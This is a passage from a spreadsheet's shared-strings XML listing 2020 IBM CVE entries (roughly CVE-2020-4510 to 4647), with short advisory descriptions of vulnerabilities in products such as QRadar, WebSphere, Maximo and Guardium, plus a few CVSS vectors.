    <t>CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L</t>
  </si>
  <si>
    <t>CVE-2020-4510</t>
  </si>
  <si>
    <t>IBM QRadar SIEM 7.3 and 7.4 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 182365.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:L</t>
  </si>
  <si>
    <t>CVE-2020-4511</t>
  </si>
  <si>
    <t>IBM QRadar SIEM 7.3 and 7.4 could allow an authenticated user to cause a denial of service of the qflow process by sending a malformed sflow command. IBM X-Force ID: 182366.</t>
  </si>
  <si>
    <t>CVE-2020-4512</t>
  </si>
  <si>
    <t>IBM QRadar SIEM 7.3 and 7.4 could allow a remote privileged user to execute commands.</t>
  </si>
  <si>
    <t>CVE-2020-4513</t>
  </si>
  <si>
    <t>IBM QRadar SIEM 7.3 and 7.4 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 182368.</t>
  </si>
  <si>
    <t>CVE-2020-4516</t>
  </si>
  <si>
    <t>IBM Business Process Manager 8.5, 8.6 and IBM Business Automation Workflow 18.0, 19.0, and 20.0 are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 182371.</t>
  </si>
  <si>
    <t>CVE-2020-4520</t>
  </si>
  <si>
    <t>IBM Cognos Analytics 11.0 and 11.1 could allow a remote attacker to inject malicious HTML code that when viewed by the authenticated victim would execute the code. IBM X-Force ID: 182395.</t>
  </si>
  <si>
    <t>CVE-2020-4521</t>
  </si>
  <si>
    <t>IBM Maximo Asset Management 7.6.0 and 7.6.1 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization in Java. By sending specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 182396.</t>
  </si>
  <si>
    <t>CVE-2020-4522</t>
  </si>
  <si>
    <t>IBM Jazz Team Server based Applications are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 182397.</t>
  </si>
  <si>
    <t>CVE-2020-4524</t>
  </si>
  <si>
    <t>IBM Jazz Foundation products is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 182434.</t>
  </si>
  <si>
    <t>CVE-2020-4525</t>
  </si>
  <si>
    <t>IBM Jazz Foundation and IBM Engineering products are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 182435.</t>
  </si>
  <si>
    <t>CVE-2020-4526</t>
  </si>
  <si>
    <t>IBM Maximo Asset Management 7.6.0 and 7.6.1 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 182436.</t>
  </si>
  <si>
    <t>CVE-2020-4527</t>
  </si>
  <si>
    <t>IBM Planning Analytics 2.0 could allow a remote attacker to obtain sensitive information, caused by the failure to set the Secure flag for the session cookie in TLS mode. By intercepting its transmission within an HTTP session, an attacker could exploit this vulnerability to capture the cookie and obtain sensitive information. IBM X-Force ID: 182631.</t>
  </si>
  <si>
    <t>CVE-2020-4528</t>
  </si>
  <si>
    <t>IBM MQ Appliance (IBM DataPower Gateway 10.0.0.0 and 2018.4.1.0 through 2018.4.1.12) could allow a local user, under special conditions, to obtain highly sensitive information from log files. IBM X-Force ID: 182658.</t>
  </si>
  <si>
    <t>CVE-2020-4529</t>
  </si>
  <si>
    <t>IBM Maximo Asset Management 7.6.0 and 7.6.1 is vulnerable to server side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. IBM X-Force ID: 182713.</t>
  </si>
  <si>
    <t>CVE-2020-4530</t>
  </si>
  <si>
    <t>IBM Business Automation Workflow C.D.0 and IBM Business Process Manager 8.0, 8.5, and 8.6 are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-ForceID: 182714.</t>
  </si>
  <si>
    <t>CVE-2020-4531</t>
  </si>
  <si>
    <t>IBM Business Automation Workflow 18.0, 19.0, and 20.0 and IBM Business Process Manager 8.0, 8.5, and 8.6 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 182715.</t>
  </si>
  <si>
    <t>CVE-2020-4532</t>
  </si>
  <si>
    <t>IBM Business Automation Workflow and IBM Business Process Manager (IBM Business Process Manager Express 8.5.5, 8.5.6, 8.5.7, and 8.6) could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 182716.</t>
  </si>
  <si>
    <t>CVE-2020-4533</t>
  </si>
  <si>
    <t>IBM Jazz Reporting Service 6.0.6, 6.0.6.1, and 7.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 182717.</t>
  </si>
  <si>
    <t>CVE-2020-4534</t>
  </si>
  <si>
    <t>IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 could allow a local authenticated attacker to gain elevated privileges on the system, caused by improper handling of UNC paths. By scheduling a task with a specially-crafted UNC path, an attacker could exploit this vulnerability to execute arbitrary code with higher privileges. IBM X-Force ID: 182808.</t>
  </si>
  <si>
    <t>CVE-2020-4535</t>
  </si>
  <si>
    <t>IBM OpenPages GRC Platform 8.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 182906.</t>
  </si>
  <si>
    <t>CVE-2020-4536</t>
  </si>
  <si>
    <t>IBM OpenPages GRC Platform 8.1 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 182907.</t>
  </si>
  <si>
    <t>CVE-2020-4539</t>
  </si>
  <si>
    <t>IBM Jazz Reporting Service 6.0.2, 6.0.6, 6.0.6.1, 7.0, and 7.0.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.</t>
  </si>
  <si>
    <t>CVE-2020-4541</t>
  </si>
  <si>
    <t>IBM Jazz Reporting Service 7.0 and 7.0.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 183039.</t>
  </si>
  <si>
    <t>CVE-2020-4542</t>
  </si>
  <si>
    <t>IBM Jazz Foundation and IBM Engineering products are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-force ID: 183046.</t>
  </si>
  <si>
    <t>CVE-2020-4544</t>
  </si>
  <si>
    <t>IBM Jazz Foundation Products could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 183189.</t>
  </si>
  <si>
    <t>CVE-2020-4545</t>
  </si>
  <si>
    <t>IBM Aspera Connect 3.9.9 could allow a remote attacker to execute arbitrary code on the system, caused by improper loading of Dynamic Link Libraries by the import feature. By persuading a victim to open a specially-crafted .DLL file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 183190.</t>
  </si>
  <si>
    <t>CVE-2020-4546</t>
  </si>
  <si>
    <t>IBM Jazz Team Server based Applications are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 183314.</t>
  </si>
  <si>
    <t>CVE-2020-4547</t>
  </si>
  <si>
    <t>IBM Jazz Foundation products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83315.</t>
  </si>
  <si>
    <t>CVE-2020-4548</t>
  </si>
  <si>
    <t>IBM Content Navigator 3.0.7 and 3.0.8 is vulnerable to improper input validation. A malicious administrator could bypass the user interface and send requests to the IBM Content Navigator server with illegal characters that could be stored in the IBM Content Navigator database. IBM X-Force ID: 183316.</t>
  </si>
  <si>
    <t>CVE-2020-4549</t>
  </si>
  <si>
    <t>IBM i2 Analyst Notebook 9.2.1 could allow a local attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 183317.</t>
  </si>
  <si>
    <t>CVE-2020-4550</t>
  </si>
  <si>
    <t>IBM i2 Analyst Notebook 9.2.1 and 9.2.2 could allow a local attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 183318.</t>
  </si>
  <si>
    <t>CVE-2020-4551</t>
  </si>
  <si>
    <t>IBM i2 Analyst Notebook 9.2.1 and 9.2.2 could allow a local attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 183319.</t>
  </si>
  <si>
    <t>CVE-2020-4552</t>
  </si>
  <si>
    <t>IBM i2 Analyst Notebook 9.2.1 could allow a local attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 183320.</t>
  </si>
  <si>
    <t>CVE-2020-4553</t>
  </si>
  <si>
    <t>IBM i2 Analyst Notebook 9.2.1 and 9.2.2 could allow a local attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 183321.</t>
  </si>
  <si>
    <t>CVE-2020-4554</t>
  </si>
  <si>
    <t>IBM i2 Analyst Notebook 9.2.1 and 9.2.2 could allow a local attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 183322.</t>
  </si>
  <si>
    <t>CVE-2020-4555</t>
  </si>
  <si>
    <t>IBM Financial Transaction Manager 3.0.6 and 3.1.0 does not invalidate session after logout which could allow an authenticated user to impersonate another user on the system. IBM X-Force ID: 183328.</t>
  </si>
  <si>
    <t>CVE-2020-4557</t>
  </si>
  <si>
    <t>IBM Business Automation Workflow 18.0, 19.0, and 20.0 and IBM Business Process Manager 8.5 and 8.6 are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 183611.</t>
  </si>
  <si>
    <t>CVE-2020-4559</t>
  </si>
  <si>
    <t>IBM Spectrum Protect 7.1 and 8.1 could allow an attacker to cause a denial of service due ti improper validation of user-supplied input. IBM X-Force ID: 183613.</t>
  </si>
  <si>
    <t>CVE-2020-4560</t>
  </si>
  <si>
    <t>IBM Financial Transaction Manager 3.2.4 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.</t>
  </si>
  <si>
    <t>CVE-2020-4561</t>
  </si>
  <si>
    <t>IBM Cognos Analytics 11.0 and 11.1 DQM API allows submitting of all control requests in unauthenticated sessions. This allows a remote attacker who can access a valid CA endpoint to read and write files to the Cognos Analytics system. IBM X-Force ID: 183903.</t>
  </si>
  <si>
    <t>CVE-2020-4562</t>
  </si>
  <si>
    <t>IBM Planning Analytics 2.0 could allow a remote attacker to obtain sensitive information by allowing cross-window communication with unrestricted target origin via documentation frames.</t>
  </si>
  <si>
    <t>CVE-2020-4564</t>
  </si>
  <si>
    <t>IBM Sterling B2B Integrator Standard Edition 5.2.0.0 through 6.0.3.1 and IBM Sterling File Gateway 2.2.0.0 through 6.0.3.1 are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 183933.</t>
  </si>
  <si>
    <t>CVE-2020-4565</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Plus 10.1.0 through 10.1.5 could allow an attacker to obtain sensitive information due to insecure communications being used between the application and server. IBM X-Force ID: 183935.</t>
  </si>
  <si>
    <t>CVE-2020-4566</t>
  </si>
  <si>
    <t>IBM Sterling B2B Integrator Standard Edition 5.2.6.0 through 5.2.6.5 and 6.0.0.0 through 6.0.3.2 stores potentially highly sensitive information in log files that could be read by an authenticated user. IBM X-Force ID: 184083.</t>
  </si>
  <si>
    <t>CVE-2020-4567</t>
  </si>
  <si>
    <t>IBM Tivoli Key Lifecycle Manager 3.0.1 and 4.0 uses an inadequate account lockout setting that could allow a remote attacker to brute force account credentials. IBM X-Force ID: 184156.</t>
  </si>
  <si>
    <t>CVE-2020-4568</t>
  </si>
  <si>
    <t>IBM Tivoli Key Lifecycle Manager 3.0, 3.0.1, and 4.0 stores user credentials in plain in clear text which can be read by a local user. IBM X-Force ID: 184157.</t>
  </si>
  <si>
    <t>CVE-2020-4569</t>
  </si>
  <si>
    <t>IBM Tivoli Key Lifecycle Manager 3.0.1 and 4.0 uses a protection mechanism that relies on the existence or values of an input, but the input can be modified by an untrusted actor in a way that bypasses the protection mechanism. IBM X-Force ID: 184158.</t>
  </si>
  <si>
    <t>CVE-2020-4572</t>
  </si>
  <si>
    <t>IBM Tivoli Key Lifecycle Manager 3.0.1 and 4.0 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 184179.</t>
  </si>
  <si>
    <t>CVE-2020-4573</t>
  </si>
  <si>
    <t>IBM Tivoli Key Lifecycle Manager 3.0.1 and 4.0 could disclose sensitive information due to responding to unauthenticated HTTP requests. IBM X-Force ID: 184180.</t>
  </si>
  <si>
    <t>CVE-2020-4574</t>
  </si>
  <si>
    <t>IBM Tivoli Key Lifecycle Manager does not require that users should have strong passwords by default, which makes it easier for attackers to compromise user accounts. IBM X-Force ID: 184181.</t>
  </si>
  <si>
    <t>CVE-2020-4575</t>
  </si>
  <si>
    <t>IBM WebSphere Application Server ND 8.5 and 9.0, and IBM WebSphere Virtual Enterprise 7.0 and 8.0 are vulnerable to cross-site scripting when High Availability Deployment Manager is configured.</t>
  </si>
  <si>
    <t>CVE-2020-4576</t>
  </si>
  <si>
    <t>IBM WebSphere Application Server 7.5, 8.0, 8.5, and 9.0 traditional could allow a remote attacker to obtain sensitive information with a specially-crafted sequence of serialized objects. IBM X-Force ID: 184428.</t>
  </si>
  <si>
    <t>CVE-2020-4578</t>
  </si>
  <si>
    <t>IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 184433.</t>
  </si>
  <si>
    <t>CVE-2020-4579</t>
  </si>
  <si>
    <t>IBM DataPower Gateway 2018.4.1.0 through 2018.4.1.12 could allow a remote attacker to cause a denial of service by sending a specially crafted HTTP/2 request with invalid characters. IBM X-Force ID: 184438.</t>
  </si>
  <si>
    <t>CVE-2020-4580</t>
  </si>
  <si>
    <t>IBM DataPower Gateway 2018.4.1.0 through 2018.4.1.12 could allow a remote attacker to cause a denial of service by sending a specially crafted a JSON request with invalid characters. IBM X-Force ID: 184439.</t>
  </si>
  <si>
    <t>CVE-2020-4581</t>
  </si>
  <si>
    <t>IBM DataPower Gateway 2018.4.1.0 through 2018.4.1.12 could allow a remote attacker to cause a denial of service by sending a chunked transfer-encoding HTTP/2 request. IBM X-Force ID: 184441.</t>
  </si>
  <si>
    <t>CVE-2020-4584</t>
  </si>
  <si>
    <t>IBM i2 iBase 8.9.13 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 184574.</t>
  </si>
  <si>
    <t>CVE-2020-4587</t>
  </si>
  <si>
    <t>IBM Sterling Connect:Direct for UNIX 4.2.0, 4.3.0, 6.0.0, and 6.1.0 is vulnerable to a stack based buffer ovreflow, caused by improper bounds checking. A local attacker could manipulate CD UNIX to obtain root provileges. IBM X-Force ID: 184578.</t>
  </si>
  <si>
    <t>CVE-2020-4588</t>
  </si>
  <si>
    <t>IBM i2 iBase 8.9.13 could allow an attacker to upload arbitrary executable files which, when executed by an unsuspecting victim could result in code execution. IBM X-Force ID: 184579.</t>
  </si>
  <si>
    <t>CVE-2020-4589</t>
  </si>
  <si>
    <t>IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 could allow a remote attacker to execute arbitrary code on the system with a specially-crafted sequence of serialized objects from untrusted sources. IBM X-Force ID: 184585.</t>
  </si>
  <si>
    <t>CVE-2020-4590</t>
  </si>
  <si>
    <t>IBM WebSphere Application Server Liberty 17.0.0.3 through 20.0.0.9 running oauth-2.0 or openidConnectServer-1.0 server features is vulnerable to a denial of service attack conducted by an authenticated client. IBM X-Force ID: 184650.</t>
  </si>
  <si>
    <t>CVE-2020-4591</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Server 8.1.0.000 through 8.1.10.000 could disclose sensitive information in nondefault settings due to occasionally not encrypting the second chunk of an object in an encrypted container pool. IBM X-Force ID: 184746.</t>
  </si>
  <si>
    <t>CVE-2020-4592</t>
  </si>
  <si>
    <t>IBM MQ Appliance 9.1.CD and LTS could allow an authenticated user, under nondefault configuration to cause a data corruption attack due to an error when using segmented messages.</t>
  </si>
  <si>
    <t>CVE-2020-4593</t>
  </si>
  <si>
    <t>IBM Security Guardium Insights 2.0.1 stores user credentials in plain in clear text which can be read by a local user. IBM X-Force ID: 184747.</t>
  </si>
  <si>
    <t>CVE-2020-4594</t>
  </si>
  <si>
    <t>IBM Security Guardium Insights 2.0.2 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 184800.</t>
  </si>
  <si>
    <t>CVE-2020-4595</t>
  </si>
  <si>
    <t>IBM Security Guardium Insights 2.0.2 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 184819.</t>
  </si>
  <si>
    <t>CVE-2020-4596</t>
  </si>
  <si>
    <t>IBM Security Guardium Insights 2.0.2 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 184812.</t>
  </si>
  <si>
    <t>CVE-2020-4597</t>
  </si>
  <si>
    <t>IBM Security Guardium Insights 2.0.2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84822.</t>
  </si>
  <si>
    <t>CVE-2020-4598</t>
  </si>
  <si>
    <t>IBM Security Guardium Insights 2.0.1 could allow a remote attacker to conduct phishing attacks, using an open redirect attack. By persuading a victim to visit a specially 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84823.</t>
  </si>
  <si>
    <t>CVE-2020-4599</t>
  </si>
  <si>
    <t>IBM Security Guardium Insights 2.0.2 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 184824.</t>
  </si>
  <si>
    <t>CVE-2020-4600</t>
  </si>
  <si>
    <t>IBM Security Guardium Insights 2.0.2 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 184832.</t>
  </si>
  <si>
    <t>CVE-2020-4602</t>
  </si>
  <si>
    <t>IBM Security Guardium Insights 2.0.2 stores user credentials in plain in clear text which can be read by a local user. IBM X-Force ID: 184836.</t>
  </si>
  <si>
    <t>CVE-2020-4603</t>
  </si>
  <si>
    <t>IBM Security Guardium Insights 2.0.1 performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses. IBM X-Force ID: 184880.</t>
  </si>
  <si>
    <t>CVE-2020-4604</t>
  </si>
  <si>
    <t>IBM Security Guardium Insights 2.0.2 stores user credentials in plain in clear text which can be read by a local privileged user. IBM X-Force ID: 184861.</t>
  </si>
  <si>
    <t>CVE-2020-4606</t>
  </si>
  <si>
    <t>IBM Security Verify Privilege Manager 10.8 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A local attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 184883.</t>
  </si>
  <si>
    <t>CVE-2020-4607</t>
  </si>
  <si>
    <t>IBM Security Secret Server (IBM Security Verify Privilege Vault Remote 1.2 ) could allow a local user to bypass security restrictions due to improper input validation. IBM X-Force ID: 184884.</t>
  </si>
  <si>
    <t>CVE-2020-4609</t>
  </si>
  <si>
    <t>IBM Security Sevret Server (IBM Security Verify Privilege Manager 10.8.2) is vulnerable to a buffer overflow, caused by improper bounds checking. A local attacker could overflow a buffer and execute arbitrary code on the system or cause the system to crash. IBM X-Force ID: 184917.</t>
  </si>
  <si>
    <t>CVE-2020-4610</t>
  </si>
  <si>
    <t>IBM Security Secret Server (IBM Security Verify Privilege Manager 10.8.2 ) could allow a local user to execute code due to improper integrity checks. IBM X-Force ID: 184919.</t>
  </si>
  <si>
    <t>CVE-2020-4611</t>
  </si>
  <si>
    <t>IBM Data Risk Manager (iDNA) 2.0.6 could allow an authenticated user to bypass security and execute actions reserved for admins. IBM X-Force ID: 184922.</t>
  </si>
  <si>
    <t>CVE-2020-4612</t>
  </si>
  <si>
    <t>IBM Data Risk Manager (iDNA) 2.0.6 could allow an authenticated user to obtain sensitive information using a specially crafted HTTP request. IBM X-Force ID: 184924.</t>
  </si>
  <si>
    <t>CVE-2020-4613</t>
  </si>
  <si>
    <t>IBM Data Risk Manager (iDNA) 2.0.6 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 184925.</t>
  </si>
  <si>
    <t>CVE-2020-4614</t>
  </si>
  <si>
    <t>IBM Data Risk Manager (iDNA) 2.0.6 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt sensitive information. IBM X-Force ID: 184927.</t>
  </si>
  <si>
    <t>CVE-2020-4615</t>
  </si>
  <si>
    <t>IBM Data Risk Manager (iDNA) 2.0.6 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 184928.</t>
  </si>
  <si>
    <t>CVE-2020-4616</t>
  </si>
  <si>
    <t>IBM Data Risk Manager (iDNA) 2.0.6 could disclose sensitive username information to an attacker using a specially crafted HTTP request. IBM X-Force ID: 184929.</t>
  </si>
  <si>
    <t>CVE-2020-4617</t>
  </si>
  <si>
    <t>IBM Data Risk Manager (iDNA) 2.0.6 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 184930.</t>
  </si>
  <si>
    <t>CVE-2020-4618</t>
  </si>
  <si>
    <t>IBM Data Risk Manager (iDNA) 2.0.6 could allow a privileged user to cause a denial of service due to improper input validation. IBM X-Force ID: 184937.</t>
  </si>
  <si>
    <t>CVE-2020-4619</t>
  </si>
  <si>
    <t>IBM Data Risk Manager (iDNA) 2.0.6 stores user credentials in plain in clear text which can be read by an authenticated user. IBM X-Force ID: 184976.</t>
  </si>
  <si>
    <t>CVE-2020-4620</t>
  </si>
  <si>
    <t>IBM Data Risk Manager (iDNA) 2.0.6 could allow a remote authenticated attacker to upload arbitrary files, caused by the improper validation of file extensions. By sending a specially-crafted HTTP request, a remote attacker could exploit this vulnerability to upload a malicious file, which could allow the attacker to execute arbitrary code on the vulnerable system. IBM X-Force ID: 184979.</t>
  </si>
  <si>
    <t>CVE-2020-4621</t>
  </si>
  <si>
    <t>IBM Data Risk Manager (iDNA) 2.0.6 could allow an authenticated user to escalate their privileges to administrator due to insufficient authorization checks. IBM X-Force ID: 184981.</t>
  </si>
  <si>
    <t>CVE-2020-4622</t>
  </si>
  <si>
    <t>IBM Data Risk Manager (iDNA) 2.0.6 contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data. IBM X-Force ID: 184983.</t>
  </si>
  <si>
    <t>CVE-2020-4623</t>
  </si>
  <si>
    <t>IBM i2 iBase 8.9.13 could allow a local authenticated attacker to execute arbitrary code on the system, caused by a DLL search order hijacking flaw. By using a specially-crafted .DLL file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 184984.</t>
  </si>
  <si>
    <t>CVE-2020-4624</t>
  </si>
  <si>
    <t>IBM Cloud Pak for Security 1.3.0.1 (CP4S) uses weaker than expected cryptographic algorithms during negotiation could allow an attacker to decrypt sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-4625</t>
  </si>
  <si>
    <t>IBM Cloud Pak for Security 1.3.0.1(CP4S) could allow a remote attacker to obtain sensitive information, caused by the failure to set the HTTPOnly flag. A remote attacker could exploit this vulnerability to obtain sensitive information from the cookie.</t>
  </si>
  <si>
    <t>CVE-2020-4626</t>
  </si>
  <si>
    <t>IBM Cloud Pak for Security 1.3.0.1 (CP4S) could reveal sensitive information about the internal network to an authenticated user using a specially crafted HTTP request. IBM X-Force ID: 185362.</t>
  </si>
  <si>
    <t>CVE-2020-4627</t>
  </si>
  <si>
    <t>IBM Cloud Pak for Security 1.3.0.1(CP4S) potentially vulnerable to CVS Injection. A remote attacker could execute arbitrary commands on the system, caused by improper validation of csv file contents. IBM X-Force ID: 185367.</t>
  </si>
  <si>
    <t>CVE-2020-4628</t>
  </si>
  <si>
    <t>IBM Cloud Pak for Security (CP4S) 1.3.0.1 and 1.4.0.0 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 185369.</t>
  </si>
  <si>
    <t>CVE-2020-4629</t>
  </si>
  <si>
    <t>IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 could allow a local user with specialized access to obtain sensitive information from a detailed technical error message. This information could be used in further attacks against the system. IBM X-Force ID: 185370.</t>
  </si>
  <si>
    <t>CVE-2020-4631</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Plus 10.1.0 through 10.1.6 agent files, in non-default configurations, on Windows are assigned access to everyone with full control permissions, which could allow a local user to cause interruption of the service operations. IBM X-Force ID: 185372.</t>
  </si>
  <si>
    <t>CVE-2020-4632</t>
  </si>
  <si>
    <t>IBM InfoSphere Metadata Asset Manager 11.7 is vulnerable to server-side request forgery. By sending a specially crafted request, a remote authenticated attacker could exploit this vulnerability to submit or control server requests. IBM X-Force ID: 185416.</t>
  </si>
  <si>
    <t>CVE-2020-4633</t>
  </si>
  <si>
    <t>IBM Resilient SOAR V38.0 could allow a remote attacker to execute arbitrary code on the system, caused by formula injection due to improper input validation.</t>
  </si>
  <si>
    <t>CVE-2020-4635</t>
  </si>
  <si>
    <t>IBM Resilient SOAR 40 and earlier could disclose sensitive information by allowing a user to enumerate usernames.</t>
  </si>
  <si>
    <t>CVE-2020-4636</t>
  </si>
  <si>
    <t>IBM Resilient OnPrem 38.2 could allow a privileged user to inject malicious commands through Python3 scripting. IBM X-Force ID: 185503.</t>
  </si>
  <si>
    <t>CVE-2020-4638</t>
  </si>
  <si>
    <t>IBM API Connect's API Manager 2018.4.1.0 through 2018.4.1.12 is vulnerable to privilege escalation. An invitee to an API Provider organization can escalate privileges by manipulating the invitation link. IBM X-Force ID: 185508.</t>
  </si>
  <si>
    <t>CVE-2020-4640</t>
  </si>
  <si>
    <t>Certain IBM API Connect 10.0.0.0 through 10.0.1.0 and 2018.4.1.0 through 2018.4.1.13 configurations can result in sensitive information in the URL fragment identifiers. This information can be cached in the intermediate nodes like proxy servers, cdn, logging platforms, etc. An attacker can make use of this information to perform attacks by impersonating a user. IBM X-Force ID: 185510.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:A/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N</t>
  </si>
  <si>
    <t>CVE-2020-4642</t>
  </si>
  <si>
    <t>IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 9.7, 10.1, 10.5, 11.1, and 11.5 could allow local attacker to cause a denial of service inside the "DB2 Management Service".</t>
  </si>
  <si>
    <t>CVE-2020-4643</t>
  </si>
  <si>
    <t>IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information. IBM X-Force ID: 185590.</t>
  </si>
  <si>
    <t>CVE-2020-4644</t>
  </si>
  <si>
    <t>IBM Planning Analytics Local 2.0.0 through 2.0.9.1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85716.</t>
  </si>
  <si>
    <t>CVE-2020-4645</t>
  </si>
  <si>
    <t>IBM Planning Analytics Local 2.0.0 through 2.0.9.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 185717.</t>
  </si>
  <si>
    <t>CVE-2020-4646</t>
  </si>
  <si>
    <t>IBM Sterling B2B Integrator Standard Edition 5.2.0.0 through 5.2.6.5, 6.0.0.0 through 6.0.3.3, and 6.1.0.0 through 6.1.0.2 could allow an authenticated user to view pages they shoiuld not have access to due to improper authorization control.</t>
  </si>
  <si>
    <t>CVE-2020-4647</t>
  </si>
  <si>
